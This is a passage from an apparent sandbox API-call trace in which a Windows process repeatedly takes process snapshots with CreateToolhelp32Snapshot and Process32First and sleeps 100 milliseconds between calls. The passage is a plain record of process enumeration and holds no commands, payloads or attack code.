th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.102] Sleep (dwMilliseconds=0x64) [0232.143] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0232.194] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.417] Sleep (dwMilliseconds=0x64) [0232.457] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0232.469] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.677] Sleep (dwMilliseconds=0x64) [0232.719] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0232.735] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.866] Sleep (dwMilliseconds=0x64) [0232.913] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0232.924] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.078] Sleep (dwMilliseconds=0x64) [0233.116] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0233.132] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.302] Sleep (dwMilliseconds=0x64) [0233.339] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0233.398] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.664] Sleep (dwMilliseconds=0x64) [0233.729] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0233.749] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0233.909] Sleep (dwMilliseconds=0x64) [0233.947] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0233.960] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.109] Sleep (dwMilliseconds=0x64) [0234.147] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0234.225] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.382] Sleep (dwMilliseconds=0x64) [0234.423] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0234.440] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.670] Sleep (dwMilliseconds=0x64) [0234.674] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0234.730] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.863] Sleep (dwMilliseconds=0x64) [0234.874] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0234.886] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0234.961] Sleep (dwMilliseconds=0x64) [0234.963] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0234.976] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.051] Sleep (dwMilliseconds=0x64) [0235.054] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0235.066] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.150] Sleep (dwMilliseconds=0x64) [0235.152] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0235.172] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.288] Sleep (dwMilliseconds=0x64) [0235.290] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0235.302] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.382] Sleep (dwMilliseconds=0x64) [0235.385] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0235.397] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.471] Sleep (dwMilliseconds=0x64) [0235.474] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0235.486] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.562] Sleep (dwMilliseconds=0x64) [0235.564] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0235.576] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.656] Sleep (dwMilliseconds=0x64) [0235.659] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0235.680] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.756] Sleep (dwMilliseconds=0x64) [0235.760] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0235.772] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.855] Sleep (dwMilliseconds=0x64) [0235.858] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0235.893] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.993] Sleep (dwMilliseconds=0x64) [0236.000] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0236.018] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.094] Sleep (dwMilliseconds=0x64) [0236.097] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0236.109] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.186] Sleep (dwMilliseconds=0x64) [0236.188] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0236.231] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.321] Sleep (dwMilliseconds=0x64) [0236.322] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0236.335] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.416] Sleep (dwMilliseconds=0x64) [0236.419] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0236.430] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.538] Sleep (dwMilliseconds=0x64) [0236.544] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0236.559] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.643] Sleep (dwMilliseconds=0x64) [0236.645] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1cd0 [0236.657] Process32First (in: hSnapshot=0x1cd0, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.743] Sleep (dwMilliseconds=0x64) [0236.745] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0236.759] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.846] Sleep (dwMilliseconds=0x64) [0236.851] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0236.864] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.944] Sleep (dwMilliseconds=0x64) [0236.946] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0236.959] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.043] Sleep (dwMilliseconds=0x64) [0237.044] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0237.132] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.247] Sleep (dwMilliseconds=0x64) [0237.249] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0237.260] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.333] Sleep (dwMilliseconds=0x64) [0237.338] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0237.352] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.425] Sleep (dwMilliseconds=0x64) [0237.428] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0237.440] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.524] Sleep (dwMilliseconds=0x64) [0237.528] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0237.544] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.625] Sleep (dwMilliseconds=0x64) [0237.626] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0237.638] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.723] Sleep (dwMilliseconds=0x64) [0237.726] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0237.738] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.826] Sleep (dwMilliseconds=0x64) [0237.827] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0237.839] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0237.919] Sleep (dwMilliseconds=0x64) [0237.921] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0237.932] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.007] Sleep (dwMilliseconds=0x64) [0238.009] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0238.021] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.097] Sleep (dwMilliseconds=0x64) [0238.098] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0238.111] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.191] Sleep (dwMilliseconds=0x64) [0238.193] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0238.240] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.362] Sleep (dwMilliseconds=0x64) [0238.364] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0238.377] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.449] Sleep (dwMilliseconds=0x64) [0238.451] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0238.465] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.551] Sleep (dwMilliseconds=0x64) [0238.553] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0238.571] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.652] Sleep (dwMilliseconds=0x64) [0238.654] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0238.667] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.779] Sleep (dwMilliseconds=0x64) [0238.782] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0238.794] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.879] Sleep (dwMilliseconds=0x64) [0238.880] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0238.896] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.968] Sleep (dwMilliseconds=0x64) [0238.969] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0238.981] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.052] Sleep (dwMilliseconds=0x64) [0239.054] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0239.064] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.139] Sleep (dwMilliseconds=0x64) [0239.140] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0239.156] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.251] Sleep (dwMilliseconds=0x64) [0239.252] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0239.263] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.340] Sleep (dwMilliseconds=0x64) [0239.341] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0239.352] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.431] Sleep (dwMilliseconds=0x64) [0239.432] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0239.517] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.593] Sleep (dwMilliseconds=0x64) [0239.597] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0239.608] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.732] Sleep (dwMilliseconds=0x64) [0239.733] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0239.755] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0239.839] Sleep (dwMilliseconds=0x64) [0239.841] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2478 [0239.852] Process32First (in: hSnapshot=0x2478, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, 